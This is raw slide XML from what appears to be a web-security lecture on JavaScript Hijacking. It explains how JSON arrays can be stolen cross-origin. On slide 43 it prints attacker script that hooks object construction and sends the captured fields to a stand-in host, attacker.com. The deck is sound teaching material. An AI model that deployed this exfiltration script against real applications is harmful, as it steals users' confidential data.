        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>JavaScript Hijacking is an attack against the data transport mechanism used by many rich Web applications. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>JavaScript Hijacking allows an unauthorized attacker to read confidential data from a vulnerable application using a technique similar to the one commonly used to create mashups.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>This technique builds on CSRF, Cross Site Request Forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Web browsers enforce the Same Origin Policy in order to protect users from malicious websites. JavaScript Hijacking allows an attacker to bypass the Same Origin Policy in the case that a Web application uses JavaScript to communicate confidential information. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Any data transport format where messages can be interpreted as one or more valid JavaScript statements is vulnerable to JavaScript Hijacking. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>JSON makes JavaScript Hijacking easier by the fact that a JSON array stands on its own as a valid JavaScript statement. Since arrays are a natural form for communicating lists, they are commonly used wherever an application needs to communicate multiple values. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Put another way, a JSON array is directly vulnerable to JavaScript Hijacking. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The attack is possible because Web browsers don't protect JavaScript the same way they protect HTML; if a Web application transfers confidential data using messages written in JavaScript, in some cases the messages can be read by an attacker.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ltLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Javascript Hijacking Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94212"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86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613715-5FBB-45EF-B1A5-2F206DD40F34}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68612" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The following example shows how an attacker can mimic the client and gain access to the confidential data the server returns.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The client requests data from a server and evaluates the result as JSON with the following code:</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var object;</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var req = new XMLHttpRequest();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>req.open("GET", "/object.json",true);</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req.onreadystatechange = function () {</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if (req.readyState == 4) {</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	var txt = req.responseText;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	object = eval("(" + txt + ")");</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	req = null;</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	}</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>req.send(null);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The server responds with an array in JSON format:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>"purchases":60000.00, "email":"brian@fortifysoftware.com" },</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>{"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>"purchases":120000.00, "email":"katrina@fortifysoftware.com"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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Javascript Hijacking Example (cont..)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9523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696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4F82762-8C45-4369-9D9C-575F188F1E93}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69636" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="5502275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Other users cannot access this information without knowing the user's session identifier (stored as cookie). However, if a victim visits a malicious website, the malicious site can retrieve the information using JavaScript Hijacking. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>If a victim can be tricked into visiting a Web page that contains the following malicious code, the victim's lead information will be sent to the attacker's Web site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>// override the constructor used to create all objects so // that whenever the "email" field is set, the method // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>captureObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>() will run. Since "email" is the final field,  this will allow us to steal the whole object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>function Object() {</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this.email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> setter = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>captureObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>// Send the captured object back to the attacker's Web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>captureObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>(x) {</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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>objString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> = "";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>fld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> in this) {</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objString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>fld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> + ": " + this[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>fld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>] + ", ";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	}</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objString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> += "email: " + x;</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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>();</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req.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>("GET", "http://attacker.com?obj=" + escape(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>objString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>),true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>req.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>(null);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;&lt;!-- Use a script tag to bring in victim's data --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>="http://www.example.com/object.json"&gt;&lt;/script&gt;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en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Javascript Hijacking (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9626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06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32028D1-0CD8-421D-85DD-B9B4DD2D16A8}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70660" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The malicious code uses a script tag to include the JSON object in the current page. The Web browser will send up the appropriate session cookie with the  request.  (CSRF!! Cross Site Request Forgery)</a:t>
            </a:r>
